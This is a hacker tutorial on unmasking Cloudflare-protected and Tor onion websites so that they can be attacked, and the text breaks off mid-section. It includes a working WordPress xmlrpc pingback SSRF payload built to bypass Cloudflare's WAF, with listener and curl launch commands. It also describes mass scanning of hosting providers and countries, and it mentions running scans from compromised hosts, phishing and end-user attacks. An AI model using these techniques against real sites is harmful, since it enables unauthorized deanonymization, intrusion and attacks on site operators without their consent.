[[ Tutorial on unmasking Cloudflare and Tor hidden services - v0.8 ]]


Introduction / FAQ
- What is cloudflare or a tor hidden service? Why is this a giant pain in the ass?
- How long will this guide be useful for?
- What about Windows?
- What are the chances of success?
- What do I do (about hacking a site) if I can't unmask the site?
- How to use nmap or other tools on a tor site
- Cloudflare Unmasking Hacks That Don't Work Anymore

General Techniques for Unmasking Hidden Sites
- SSRF (exploits!)
- Wordpress's Built In SSRF
- Actual exploit with a CloudFlare bypass
- Uploading Avatars on Forums, and Similar Common SSRFs
- Other stuff that probably connects out
- More tools

Email
- It's not hard to get most normal websites to email you
- Ask people to email you

DNS records
- MX records
- MX records that might sort of point in the general direction
- Using search engines and databases to find the real ip addresses of websites
- DNS History sites
- Brute forcing subdomains

Searching for sites based on hunches as to where they might be located
- It's kind of like using a pirate map
- Bulletproof webhosts
- Hosting companies known for hosting drug related content
- Brute forcing vhosts (and why it's a dead end)

Mapping the site structure
- Javascript files
- APIs
- Other loot

Misc Exploits/Misconfigurations/Tools
- Status Pages
- Wordpress upload directory
- changelog.txt
- Google Image Search
- Burp Collaborator Everywhere plugin
- XML input forms (XXE attacks)
- IP addresses and hostnames in output
- Google dorking for stuff
- End User attacks
- DoS attacks


[[[ Introduction / FAQ ]]]

- What is cloudflare or a tor hidden service? Why is this a giant pain in the ass?

Cloudflare is an anti denial of service company that works by actually hiding a website. Requests to the website hit cloudflare's servers first, which decide based on your ip and browser whether or not to send you through to the site. The servers are a kind of reverse proxy (look it up if you've never heard of one). As an added benefit they also cache static website pages and have an optional WAF that's fairly bad but will still interfere with your scanners. Most importantly, each ip address is only allowed to make around 23,000 requests per day.
You've seen cloudflare protected sites before. If you use Tor Browser to browse the normal internet you'll notice lots of sites with orange cones that want you to identify all the traffic lights in a picture. That's a cloudflare reverse proxy deciding if you're a bot. If you're trying to hack the site, all the proxies in the way get annoying.
A tor hidden service is a .onion site. There are a lot of really well thought out hidden services and this guide really won't help you that much with them. There's also a lot of really shitty vendor sites, scammers, and collections of complete weirdos with much worse security. The biggest challenges with tor sites are that they rarely enable cryptographic services you can fingerprint (SSL, SSH), don't have any DNS you can use, and usually have captchas everywhere.
Other challenges with tor sites: it's harder to verify whether you've found the correct server, and they tend to have a higher overall level of security. On the brighter side you can portscan tor hidden sites - with cloudflare protected sites you're limited to connecting to https until you figure out where the site is actually located.


- How long will this guide be useful for?

The two best ways of unmasking hidden sites stopped working in the last couple of years: SSL search engines, and a DNS hack that used to work close to 100% of the time (http://www.crimeflare.org:82/cfs.html). Unfortunately Cloudflare seems to have fixed these issues and is taking some half assed steps towards making sites slightly less identifiable by their ssl certificates.
I've organized this document from the most to the least commonly vulnerable type of attack. Techniques at the bottom can still work once in a while, and anyway some of the people reading this will have more success with some of these attacks than I have. It just always works that way.


- What about Windows?

All the example commands here use Linux. Many of them (like nmap) undoubtedly work on Windows too. Just use Linux, and if you're trying to pick a distribution for hacking stuff like this, try Kali Linux. It's a fairly recent version of Debian stuffed full of working hacking tools, which is useful.


- What are the chances of success?

Idk. On any specific site it really depends on the technical skills and attention to detail of the people running the site and how much they care about being unmasked. It's not a bad idea to find a giant collection of sites that you wouldn't mind unmasking and try some of these attacks on one after another - it'll go way faster than doing them one at a time.


- What do I do (about hacking a site) if I can't unmask the site?

If you want to launch hacks at a site and can't unmask it, you can still attack it through the cloudflare reverse proxy. Their proxies aren't that smart and only throw captchas at Tor users. Their WAF is not hard to get around, and it returns a cloudflare-branded 403 error code so you know exactly when it's the problem.
Cloudflare has a max number of requests per ip, and since you can't use tor, that can really slow things down. I can usually get around 22-23k requests per ip before getting blocked for the day.
If you search reddit.com/r/netsec some people have clever rotating proxy arrangements that involve automatically setting up hosts in AWS. This will get your AWS account banned pretty quickly, but in the meantime you're fine. I'm not that elite, so I usually just launch scans from a few different hacked hosts. There's always at least 10 morons online who're rootable if you just scan for an exploit you know works.


- How to use nmap or other tools on a tor site

Cloudflare protected sites will only allow access to https via their url. Tor hidden services allow nearly any sort of TCP connection, so if you combine a tool like proxychains4 (aka proxychains-ng; it's just called proxychains4 in the Kali linux repo) with anything that makes normal non-raw connections to a site, you can port scan, directory brute force, etc over the socks proxy that comes with the standard tor daemon.
When using nmap you have to be careful not to do anything that requires raw sockets. The easiest way is to just launch it as a non-root user. -sT is a TCP connect scan, -sV is version detection, and most importantly -sC launches any NSE (lua) script that seems appropriate. Many of the scripts that come with nmap are for gathering information, so I'd really recommend trying them out.

Proxychains without the -q flag will tell you "socket error or timeout" for every closed port, but it's nice to be able to check that it's working. The .onion site will show up as resolving to 224.0.0.1 (a placeholder address proxychains uses for remote dns resolution).

Nmap example:
proxychains4 -q nmap -P0 -sT -sV -sC -F -T4 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.onion

I use -F (top 100 ports only) when scanning tor sites because I'm impatient, and I'm not sure a hidden service will have a random port like 23153 exposed anyway - the operator has to explicitly forward each port the hidden service listens on. Don't take my word for it though; to scan every possible port use -p- instead of -F.

What you'd like to find are: encrypted services that can be fingerprinted like https, ssh, smtps, etc (if it's encrypted it should involve a unique key), and banners that reveal other hostnames or ip addresses (it'd be nice if more people ran smtp on the darknet). Usually you just find an http port and not a lot else. You can do the exact same thing with proxychains4 and netcat or most other hacking tools that work over tcp.
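For example, here's grabbing just the http response headers from an onion with curl, and poking a port with ncat, both through the tor socks proxy (the onion address is obviously a placeholder, and this assumes /etc/proxychains4.conf points at the default tor socks port, 127.0.0.1:9050):

proxychains4 -q curl -s -D - -o /dev/null http://xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.onion/
proxychains4 -q ncat xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.onion 80

Curl can also talk to the tor socks proxy directly with --socks5-hostname 127.0.0.1:9050 if you'd rather skip proxychains.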


- Cloudflare Unmasking Hacks That Don't Work Anymore

There are tons of obsolete ways of discovering what's behind a cloudflare hidden website. The best was http://crimeflare.org:82/cfs.html - if you stuck in the domain of a cloudflare protected site it would use some dns hack against cloudflare's dns servers that gave you the real ip address almost every time. Those were the days *sigh*. You can still occasionally use it to find other sites that are associated with the same cloudflare account as the target site (discussed later).
Another hack was looking up the site's ssl fingerprint using SSL search engines. Nowadays cloudflare is allowed to make its own SSL certificates, so you basically never run into a situation where the exact same ssl certificate is used by both the cloudflare reverse proxy and the real website. Variations on this hack are still kind of useful, but it's really far from the automatic win it used to be. On top of all that, the best places to search for ssl fingerprints are nearly useless these days, either with amazingly outdated information or seemingly never having the site that you're looking for.
I'm going to go into this in more detail later, despite it not being that effective anymore. I'll include the syntax to search via Shodan.


--== General Techniques for Unmasking Hidden Sites

- SSRF (exploits!)

An SSRF is a type of web exploit - it's when you trick a remote server into connecting out so you can grab its ip address (in this case). Any time a server makes an http(s) request out and you control the destination, it's an SSRF. They're good for a lot more than that - look up Erratic's Capital One hack if you're interested in seeing what an insecure image upload/download form did to a bank.
SSRFs are well worth looking for, and I'd say these days they're my number one or two way of identifying the real ip address of websites. They work on both Cloudflare protected sites and Tor Hidden Services, although Tor Hidden Services are frequently run on servers that are specifically configured never to make outbound connections (maybe around half the time for non-Impedya vendor sites).


- Wordpress's Built In SSRF

Wordpress has an API with a pingback feature that can be used to force any wordpress site with it enabled to connect out, assuming that a number of conditions are met. A lot of vendor sites use Wordpress. The biggest deal breaker is that the blog owner must have actually made a blog post or two themselves. They also must have an accessible xmlrpc.php file ("XML-RPC server accepts POST requests only."). Cloudflare's WAF actually blocks pingback requests to the api, however there's at least one really obvious way of reformatting the request so it's not blocked, which I'll share here.

Conditions:
- To check if a site is running wordpress visit https://sitehere.com/readme.html
- The url https://sitehere.com/xmlrpc.php needs to say something about only accepting POST requests when visited.
- The blog owner must have made two blog posts or pages. Usually people make a lot of them.
- It must be possible for the server to make an outgoing connection. Some tor hidden sites disable this in various ways.
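A quick, hedged way to check the first two conditions with curl before bothering with the full exploit (target-site-here is a placeholder; stick proxychains4 in front for an onion):

curl -sk https://target-site-here/readme.html | grep -i wordpress
curl -sk https://target-site-here/xmlrpc.php

The first should mention WordPress somewhere in the output, and the second should print the "XML-RPC server accepts POST requests only." message.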

All this exploit does is take the known wordpress pingback ssrf, which uses an API call named pingback.ping, and reformat it to use the system.multicall api call. If this exploit ever gets blocked by Cloudflare, their WAF is such a PoS that there's probably a large number of other ways of getting around it (for example Wordpress seems happy with "pingback&#x002Eping" instead of "pingback.ping"). Webmasters sometimes block the xmlrpc.php file entirely since it can also be used to brute force passwords.


- SSRF exploit for hidden sites (.com, .onion, etc).

Edit http://youripaddresshere/ to your listener's url, and edit the two https://target-site-here/... urls to two different blog posts or pages on the hidden site.

------------- request.txt -------------
<?xml version="1.0"?>
<methodCall>
<methodName>system.multicall</methodName>
<params>
<param><value><array><data>
<value><struct>
<member>
<name>methodName</name>
<value><string>pingback.ping</string></value>
</member>
<member>
<name>params</name><value><array><data>
<value><array><data>
<value><string>http://youripaddresshere/</string></value>
<value><string>https://target-site-here/blog-post-one</string></value>
</data></array></value>
</data></array></value>
</member>
</struct></value>
<value><struct>
<member>
<name>methodName</name>
<value><string>pingback.ping</string></value>
</member>
<member>
<name>params</name>
<value><array><data>
<value><array><data>
<value><string>http://youripaddresshere/</string></value>
<value><string>https://target-site-here/a-different-wordpress-page</string></value>
</data></array></value>
</data></array></value>
</member>
</struct></value>
</data></array></value>
</param>
</params>
</methodCall>


---------------------------------------

Run any of these commands as root to bind to port 80 and listen for a connection
Example listener command #1: nc -v -v -l -p 80
Example listener command #2: ncat -v -v -l 80
Example listener command #3: cd /dev/shm ; python3 -m http.server 80 (or "python -m SimpleHTTPServer 80" on old python 2 boxes)

Launch the exploit with this curl command. Curl is not always installed by default.
Run the exploit:
curl -k -i -X POST http://target-site-here/xmlrpc.php -A 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36' -H "Content-Type: application/xml" -H "Accept: application/xml" --data "@request.txt"

Run the exploit against a tor site:
Same deal but start with "proxychains4 curl"

If wordpress accepts the API request then you should see "<name>faultCode</name><value><int>0</int>" in two places in the output. If nothing is stopping Wordpress from connecting out then you'll see the server's ip address connect to your listener. There's some kind of rate limiting on pingback.ping, so try to get the exploit right within the first few tries.


- Uploading Avatars on Forums, and Similar Common SSRFs

If the website you're trying to unmask lets you sign up, do so immediately and provide a valid email address. A convenient option is http://mailinator.com - it gives you a throwaway inbox and shows you the sending ip address of anything that arrives. Some forums will let you upload a picture for your avatar. Some of those will let you give it the URL of a remote image, and the server will actually go and download the file, exposing its ip address in the process.
Any exploitable RFI can also be used like an SSRF and will give you the server's ip. If you can't get the avatar to load from your website, look for any sort of file, document, image, or pdf upload form. Upload forms are a frequent source of vulnerabilities in webapps, so it's a good idea to spend time screwing with them anyway. Stick your url into literally any form field on the site that says it expects a URL, and if you want to be thorough, anywhere that expects a filename too (a very slim but non-zero chance of working). Why not? Even if remote fopen is disabled, all sorts of things have libraries like curl built in that are capable of making http requests.

I wrote down a few different commands for easily listening on an ip address under the Wordpress SSRF exploit. If you're not sure whether the world can reach your port and ip address, try using a website that will run nmap for you (there's lots of them).


- Other stuff that probably connects out

There's other things that'll connect out on the average website. Plugin updates, anything email related, cronjobs, forms that accept xml input and are vulnerable to XXE attacks, plugins that were written by idiots, some image conversion libraries (read https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html), document conversion software, PDF readers, and much more.
Overall SSRFs are either the #1 or #2 most reliable way to find a website's real ip address. #2 is probably getting the site to email you, and #3 is probably MX (email server) DNS records. After I discuss those I go into stuff that rarely works, at length.


- More tools

Onionscan runs an automated list of checks against a tor site in order to find data about it. It tries to fingerprint the site in various ways and checks for status pages, open folders, and images that still have exif data included. One trick Onionscan uses is just to connect to http(s)://target-site-here/server-status to see if the Apache server-status page is enabled for everyone. The nginx equivalent is http(s)://target-site-here/status . It usually isn't enabled (in either case) for non-localhost connections, but if it is it'll show everything that's connecting to the server.
Burp Proxy (Professional) will not find the site for you, but it's a big help. When you use it in proxy mode it keeps track of all the *other* sites the main site loads files from. You can use this to find subdomains, CDNs, javascript files (which you can then go through for more URLs), and just to get a really good picture of the site's structure. Directory bruteforcing tools like wfuzz, dirb666, etc only show you files and urls that are on the main site. Burp can be configured to use tor for outgoing connections in its options panel - just set it to use SOCKS5 on port 9050 and to use the proxy for dns resolution.
I always brute force directories and files. Dirb666 is the easiest to use, but I take the wordlists from DirBuster (which is entertaining to watch but rarely does a good job). It takes a very long time to go through a list of directories that big. I'll go into it more when I'm discussing less successful attacks.


--== Email

- It's not hard to get most normal websites to email you

Email is yet another way websites connect out, so it's yet another way that badly run sites leak ip address information. Sometimes just signing up for an account is enough - look for any place where you can register yourself on the site, and hopefully you'll get an email telling you that your account is active. If you can't set up an account, look for a lost password link. Some of them email you even if you don't have an account.
It's really uncommon these days, but you should double check whether contact forms send you an email when you use them. There's a bunch of old exploits for contact forms, like the phpmailer exploit, which is almost 5 years old at this point. ImageTragick is worth checking, and old versions of TimThumb (included in many wordpress themes) would accept urls as an argument - I don't know if it still does.
If it helps, most email contact forms at some point use the venerable sendmail command line client (which isn't the same thing as the daemon of the same name). It's a fairly standardized utility, so if you're trying to figure out what parameters to inject into a mailer, look at its man page. The old phpmailer exploit could definitely be used to redirect email to yourself, but it's an ancient exploit.
If you haven't tried searching Google, Bing, and Yandex for email addresses that you've found, you probably should. In general, if you find other sites that appear to be associated with the one you're looking at, you should try to track down their locations as well, since there's a good chance they're hosted on the same machine.
Email shouldn't work on any tor hidden server set up by anyone with half a brain. In fact outbound DNS shouldn't even be enabled on any server that really wants to stay hidden (which is a massive hassle).


- Ask people to email you

If your target is a normal business of some sort, ask them for marketing information or help with something, then examine the full headers of the email they send you. As a bonus, you can use this email to make phishing emails look more legitimate.


--== DNS records

There are a couple of ways you can potentially unmask a cloudflare protected site using DNS. DNS attacks will not work on onion sites. The most common mistake is that people are kind of morons about their MX (mail exchange) records. The other is that by bruteforcing subdomains, alternate tlds, and so on, you can frequently find other sites associated with your target. Sometimes the other sites are even on the same server, and it's not hard to check.


- MX records

An MX record is how smtp servers know exactly where they're supposed to connect in order to send mail to a domain. A surprisingly large amount of the time it points directly at the hidden site (maybe around 10%). Even if it doesn't point at the site, it's really common for email to be hosted by the same company the site gets its webhosting from, which opens up a lot of scanning related possibilities. That's because it's a giant pain in the ass to run your own mail server. Remember that subdomains (including www) almost never have MX records, so if you can't find one, try taking the front off the url.

Example 1:

$ host -t MX www.xxxxxxxxxxxxxxx.net
www.xxxxxxxxxxxxxxx.net has no MX record
$ host -t MX xxxxxxxxxxxxxxx.net
xxxxxxxxxxxxxxx.net mail is handled by 0 dc-7aaba3c3a2fd.xxxxxxxxxxxxxxx.net.
$ host dc-7aaba3c3a2fd.xxxxxxxxxxxxxxx.net
dc-7aaba3c3a2fd.xxxxxxxxxxxxxxx.net has address 82.221.131.63

Hm, so 82.221.131.63 is their mail server. If you visit https://82.221.131.63 you'll get an SSL error message about a bad certificate, because the certificate is actually for xxxxxxxxxxxxxxx.net. I figure it's ok to use them as an example since they've obviously put zero effort into hiding their site, and I'm way too cheap to spend $100 to see if the avatar SSRF would work on them.
You can use the openssl s_client utility, or the version of ncat that comes with recent versions of nmap, to talk to SSL encrypted ports. Since the main ip address might serve a different SSL certificate than a particular vhost on the same server, it's a good idea to check with the openssl client both with and without -servername:

echo | openssl s_client -connect 82.221.131.63:443
echo | openssl s_client -connect 82.221.131.63:443 -servername correctsitename.net

If you look through the output you'll see the subject of the SSL certificate is xxxxxxxxxxxxxxx.net. I'll go into SSL in more detail later, but it's one of a few good ways of verifying whether or not a site is the target site. You can do this way easier with nmap:

root# nmap -PS443 -p443 -sT --script=ssl-cert 82.221.131.63
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-26 23:14 MST
Nmap scan report for www.xxxxxxxxxxxxxxx.net (82.221.131.63)
Host is up (0.30s latency).

PORT STATE SERVICE
443/tcp open https
| ssl-cert: Subject: commonName=xxxxxxxxxxxxxxx.net
| Subject Alternative Name: DNS:xxxxxxxxxxxxxxx.net, DNS:cpanel.xxxxxxxxxxxxxxx.net, DNS:cpcalendars.xxxxxxxxxxxxxxx.net, DNS:cpcontacts.xxxxxxxxxxxxxxx.net, DNS:mail.xxxxxxxxxxxxxxx.net, DNS:webdisk.xxxxxxxxxxxxxxx.net, DNS:webmail.xxxxxxxxxxxxxxx.net, DNS:www.xxxxxxxxxxxxxxx.net
| Not valid before: 2020-10-17T00:00:00
|_Not valid after: 2021-01-15T23:59:59

There's something really important I need to point out. Did you notice that in the openssl commands I specified a field called "-servername"? SSL sites these days are like http sites in that you can have more than one listening on the same ip address. The servername is basically a vhost for https (the actual mechanism is called SNI). You can alter that nmap command to look for a single servername. Keep in mind it has to be exactly right, so if the servername is "www.dumbsite.com" and you specify "dumbsite.com" it might miss it. Anyway...

How to do the same check with nmap including the servername:
nmap -PS443 -p443 -sT --script=ssl-cert --script-args="tls.servername=xxxxxxxxxxxxxxx.net" 82.221.131.63

If you're reading this to try to make your own site harder to find: if possible, leave the site on port 80 only, avoid https/ssl, and absolutely never let it be the default site on the ip address. When someone visits your server by ip they should see a default "I just installed NGINX, what now?" page or something like that.


- MX records that might sort of point in the general direction

The situation where the MX record points to the real mail server happens more than you'd expect, but sometimes it simply points at a specific hosting company's mail server. That can still be useful information. Other times it points at a bulk email service. These services mostly try to figure out how many people have seen a message, to appeal to the more legitimate sort of marketing people.
So don't get too carried away - always do a whois on the ip and make sure it would make sense for the site to be hosted there. Also remember that while it's really unusual, subdomains can have their own MX records. The only place you really see that is at colleges, where each department can have its own mail server.
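A minimal example of that sanity check, reusing the host commands from earlier (the hostnames are placeholders; the grep just pulls out the interesting whois fields, which vary a bit between registries):

host -t MX target-site-here.net
host mail.target-site-here.net
whois 82.221.131.63 | grep -iE 'orgname|org-name|netname|country|descr'

If the owner turns out to be Google, Mailgun, Proton, etc, it's just a mail provider; if it's some small hosting company, that's a netblock worth feeding into the scanning section further down.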
There's a section further down on scanning ip ranges for the website you're looking for. I tried to organize this guide from most to least likely to succeed, so scanning for the site is down in the "unlikely to get anywhere but worth trying" section.


- Using search engines and databases to find the real ip addresses of websites

I'm going to be honest, this ALMOST NEVER WORKS anymore. I may as well show you how to do it, however - maybe you'll be lucky where I've never succeeded.

https://crt.sh - I've mentioned this site before. It keeps track of ssl certificates that show up in the industry standard Certificate Transparency logs. It's the best place to start by far, even though it's not going to give you a fingerprint you can just stick into another site and win. It's also a good source of subdomains that you're unlikely to guess.
So search crt.sh for your target site's name. You'll usually get a list of every SSL cert they've bought, including various fingerprints and the ssl serial number (which is a different thing). A bunch will be provisioned by cloudflare. Letsencrypt is the free SSL certificate service, Comodo + Verisign are large commercial SSL certificate vendors, etc. You can try sticking the fingerprints and ssl serials into shodan, but it almost never works - I would say it has never worked for me, but I appear to have just gotten lucky once (see the shodan notes below).
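If you'd rather script it, crt.sh also has a JSON output mode you can query with curl (the %25. prefix is just a URL-encoded wildcard for subdomains; jq is optional but makes it readable; target-site-here.com is a placeholder):

curl -s "https://crt.sh/?q=%25.target-site-here.com&output=json" | jq -r '.[].name_value' | sort -u

That dumps every hostname that has shown up in a certificate for the domain, which doubles as a starting wordlist for the subdomain brute forcing section below.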

https://shodan.io - Don't get me wrong, shodan is a really cool site. It scans certain ports across the internet (including ssh/ssl) and lets you search the results using a number of really useful attributes. The problem is I never find what I'm actually looking for. Also you need to sign up. I can find interesting stuff using it, but I can't find exact sites. The things you can search for are listed here: https://beta.shodan.io/search/ but I've had limited luck finding the things I want to find. For one, they only index the SSL certificate that a server presents by default. I was about to say that I've never gotten it to work, but it just found the ip addresses of imgur's Varnish caching servers (the caching layer that sits immediately in front of the website).

To try it, search for things like:
ssl.cert.subject.cn:imgur.com
ssl.cert.fingerprint:<fingerprint from crt.sh>
ssl.cert.serial:036b1f6c7d65d16539f32751d0d5eb2afb75 (the serial is not the same as the cryptographic fingerprint)
It's usually also a good idea to try the subdomains that you saw on crt.sh.

Remember that you can get ssl/ssh fingerprints from nmap!

Other SSL search engines:
https://certdb.com https://censys.io https://spyse.com
CertDB (now Spyse.com) has incredibly outdated data, but it'll occasionally tell you where a site used to be hosted. If you click around enough it'll sometimes give you outdated ip addresses for a site or the names of hosting companies it used to use. Any of these will do for a quick check.

http://crimeflare.org:82/cfs.html - This site used to be a 90% reliable way of finding the real ip of a website, and there's still something useful you can do with it. If the website is using cloudflare's name servers (which pretty much only marketing companies do these days) you can usually pull up a list of other sites served by the same pair of name servers. For example, searching for "clickfunnels.com" and then clicking on the dns server name "jim ruth" takes you here: http://www.crimeflare.org:82/cgi-bin/domlist/_14056-jim-ruth - a huge list of sites, all of which are cloudflare protected and many of which are obviously operated by the same marketing company.


- DNS History sites

There are millions of them - try a google search. Most of them want you to at least make an account, and a few want money. That's probably why I don't use them (but should); for every good database out there, there's 10 crappy ones.
The idea is that sometimes a site starts off unprotected and the owners later change their minds and purchase cloudflare, so its original DNS history may still be a valid ip address for the website. I don't do this much since it costs money, but I probably should. If it works for you, let me know.


- Brute forcing subdomains

It's a really common hacking tactic to bruteforce (guess) subdomains of a known main domain. Obviously this only works on CloudFlare sites, not onions. It's really easy to do and there are many, many tools for it. All you really need is a good list of subdomains (or two, or three). The basic idea is that if you can find a subdomain that's either not hidden or badly hidden, you can use that subdomain to try to locate your main target.
The end result is potentially a list of related websites that might not be as actively hidden as the main website. To bruteforce subdomains I use a combination of the hostnames.txt file that comes with recon-ng and subdomains-top1million-110000.txt from https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS.
You might also want to edit your /etc/resolv.conf to use a public nameserver like 4.2.2.1 or 8.8.8.8. Home isps sometimes redirect your nonexistent dns requests to a webpage filled with ads, and public nameservers sometimes won't let you make more than a certain number of requests. Keep an eye out for subdomains with names like: test, stage, staging, <software name>, vpn, corporate, internal, cdn, anything that seems numbered, etc.
Subdomains named staging, test, lab, or stage are places where people test a site before uploading it to the main site; frequently that means there's extra information in error messages. VPN is a good one since at least 6 VPN exploits have been released in the last 2 years. Corporate can be stuff like filesharing servers, but I'm getting off task.
There are tools you can load subdomain wordlists into. The top one, Sublist3r, also searches several websites for the domain you're looking for. There are also tools that can do unrestricted bing/google/yahoo searches, but I generally don't use them because you need to buy (request?) API keys for the various search engines. Recon-ng probably isn't the best tool for that but works reasonably well. In the list of bash commands below I included a command you can use to combine wordlists and remove duplicate entries.
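If you don't feel like installing anything, a dumb bash loop over a wordlist does the job (wordlist.txt and target-site-here.com are placeholders; the 8.8.8.8 at the end forces a public resolver; it's slow since it's one lookup at a time):

while read sub; do host "$sub.target-site-here.com" 8.8.8.8 2>/dev/null | grep "has address"; done < wordlist.txt

If every single name comes back with the same address, the domain probably has a wildcard record - that's the situation dnsmap (below) detects for you.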

Tools:
Sublist3r - automated database recon and dns brute forcing
recon-ng - interface is slightly annoying, but it comes with a decent wordlist. It does a lot more than dns bruteforcing if you set up the other features.
dnsmap - autodetects things that dumber bruteforcing tools will not, like wildcard subdomains (you can make a subdomain like *.foobar.com, and anything.foobar.com will have the same ip as *.foobar.com).
... and way more!

Wordlists:
https://github.com/lanmaster53/recon-ng/archive/v4.9.6.tar.gz - hostnames.txt from recon-ng/data; it's a very good list but I've found it missing a small number of important hostnames
https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS - This site is awesome
https://wordlists.assetnote.io/ - this I just got from reddit today, and has more amazing wordlists. Good wordlists make a HUGE difference.

Useful bash commands:
Combine wordlists and remove duplicates - cat wordlist1.txt wordlist2.txt wordlist3.txt | sort | uniq > wordlist-all.txt
Do NOT redirect your output to a file that's also used for input! You'll delete the file.
whois - there's a few versions of essentially the same program. If you're not familiar with whois please go hit yourself with something. You'll probably have to install it, some versions are mwhois and jwhois.


--== Searching for sites based on hunches as to where they might be located

If you've gotten to this point, your chances of figuring out where the site is located are actually pretty low. We've gone from really solid ways of getting ip info, to slightly sketchier ways, to databases that rarely work, to this: brute force scanning. If you can come up with some suspect hosting companies, it doesn't take too long to scan all of them for the site you're looking for. You generally won't find it, but it's kind of fun and not hard to do. After this section there's a variation for tor sites - while you generally have no clue where they're actually located, there's a limited number of hosting companies that are friendly towards DNMs and vendor sites, and if you get a good list you can just scan all of them.
If you're wondering why I'm obsessed with SSL, it's because it's accurate - a site with "www.foobar.com" in its SSL certificate is pretty unambiguous. You'd think you could do the same thing with plain http sites, but for the most part you can't (see the vhost brute forcing section below).


- It's kind of like using a pirate map

Sometimes you'll run into a situation where you have a strong guess about where a website is hosted. Maybe their cpanel is branded, maybe their MX record points somewhere interesting, or maybe it's "general knowledge" that they're hosted at a certain company or in a specific country.
To scan an entire webhost or small ISP, do a whois on an ip address of theirs and grep for the AS number (it'll be in there somewhere). Go to https://bgp.he.net and search for ASXXXX, where XXXX is the number you saw in the whois records. That'll give you an official company name. Search https://bgp.he.net again for that company name and you'll wind up with a list of Autonomous Systems. Each AS is responsible for keeping track of a number of blocks of ip addresses. (I'm avoiding explaining what an AS actually is - it's the BGP thing, go look it up if you want to know how the internet works.) I don't have a tool for this, but if you visit each AS and then go to "IPv4 Prefixes" you can make a textfile that's basically a giant list of ip address/cidr netblocks that'll look like:

Fake example:
185.4.211.0/24
200.128.0.0/16
200.129.0.0/16
200.139.21.0/24
200.17.64.0/16
Total ips: 145796

Store all of that in a file; we'll call it netblocks.in.txt. An example command to scan them all with nmap is:

nmap -sS -sV -sC -T5 -p1-65535 -iL netblocks.in.txt

The important part is -iL netblocks.in.txt. It'll take some time, but it's quite possible to run nmap completely unattended and let it chew through every potential ip address, using the ssl certificate subject (and the servername trick from earlier) to look for an exact match. Make sure you save your output. There's another portscanner called masscan that you might want to try. It's about the same speed as nmap if you need to scan every port on a host, but if you only want to scan ports like 80, 22, or 443 across a big range, it's so much faster your head will spin.

Compare:
time nmap -sS -p80 -PS80 200.129.0.0/16
time masscan -p80 200.129.0.0/16 --rate 5000

The other cool thing about masscan is that it has its own tcp/ip engine and can run through vpns that don't have routing set up. I'm not going into it, but it's really useful if you're using a VPN provider from a hosted virtual machine.
You can take this sort of search even further - it's quite possible to scan entire countries, many of which are considerably smaller than large cloud providers like AWS. If you look around you can find lists of netblocks per country in cidr format. Masscan supports -iL like nmap does, so you can use the list of netblocks as the input for the scanner. In ALL of these cases make sure you save your output to a file!
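If you'd rather not click through bgp.he.net by hand, the RADB whois server can usually dump the announced prefixes for an AS number, and the result feeds straight into masscan (the AS number and filenames here are made up, and RADB data can be stale or incomplete, so treat this as a sketch):

whois -h whois.radb.net -- '-i origin AS64496' | grep '^route:' | awk '{print $2}' > netblocks.in.txt
masscan -p80,443 -iL netblocks.in.txt --rate 5000 -oL masscan-results.txt

Pull the live ips out of masscan-results.txt into a file, then verify them with the ssl-cert/servername trick from the MX section:

nmap -Pn -sT -p443 --script=ssl-cert --script-args="tls.servername=target-site-here.com" -iL live-hosts.txt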


- Bulletproof webhosts

If you've scanned a tor site and it has SSH open, you can use nmap (both over tor and while scanning a hosting company) to try to find a matching key fingerprint. Tor sites almost never have SSH open, but you need *something* uniquely identifiable for this approach to work - without a way of verifying an onion site other than eyeballing it, getting to this part of the document is not a sign of success. Regardless, there's a fairly short and sweet list of hosting companies that are shady enough to host darknet markets. Cloudflare protected sites, on the other hand, can be hosted pretty much anywhere normal.
Shady hosting companies like this are known as "bulletproof" hosts and are way more popular for tor hidden sites than average. Some specialize in spam, others in malware, piracy, etc. Also, for some reason you can find quite a few vendor shops (including really big ones) hosted at GoDaddy. In one case I found a huge, well known vendor site apparently being run off GoDaddy - what was possibly their real ip address was exposed by a PDF invoice download form that pulled its data from a server hosted there. That doesn't prove they're hosted there, but there's a really good chance they are.
If you are thinking of setting up a hidden site, I really wouldn't use a mainstream host like GoDaddy, The Planet, or HostGator. People who use big hosting companies should expect close to no privacy. I have noticed that tons of hidden websites use CDNs (content delivery networks). Figuring out which CDN a hidden site uses generally isn't that useful, but it's nice to know.


- Hosting companies known for hosting drug related content

Here's a few popular shady-ass hosting companies that tend to host more than their normal share of DNMs and vendor sites. As mentioned, GoDaddy is weirdly popular for vendor sites as well - it's huge, you have no privacy, and I have no idea why you'd put your site there. Cloud providers like AWS are way too big to scan. Lastly, a few of these hosting providers try to use or lease ip address space that doesn't have their name on it (specifically so you can't scan for sites); that's not that common until you get to places like OrangeWebsite or CyberBunker (busted). Here's a somewhat outdated list of popular hosts from when the crimeflare hack still worked:

www.orangewebsite.com (biggest one)
Icenetworks Ltd. (I think this is actually orange website) - https://bgp.he.net/search?search%5Bsearch%5D=Icenetworks+Ltd.&commit=Search
www.hawkhost.com
godaddy.com
knownsrv.com
ititch.com
singlehop.com

There's always one or two tiny onion hosting companies that are popular for hosting only onion sites, and they're usually quick to check out. They also tend to die a lot by being hacked - Daniel's Hosting, Freedom Hosting, and Freedom Hosting II have all been hacked out of existence. If they have replacements you should check them for your target site.


- Brute forcing vhosts (and why it's a dead end)

Nmap has a script that'll search webservers for domains from a list. If you have a target site and a list of associated sites or subdomains, you can check a range of webservers for the target being served as a vhost. There are two problems. The first is that tor site operators might not be using a standard port number (like 80 or 443). The second, less expected, problem is that around 1 in 10 websites will respond to a standard http request for _any_ vhost and either show you the same site or answer with a 301/302 redirect or something else that'll screw up your search. If you scan plain http (non ssl) sites for vhosts, expect to see large numbers of false positives.
Here's how to run the script anyway. subdomains-found.txt is stuff you've discovered, the main site is just an argument to the script (here called target-site.com), and netblocks.txt is the list of netblocks you've selected to search:

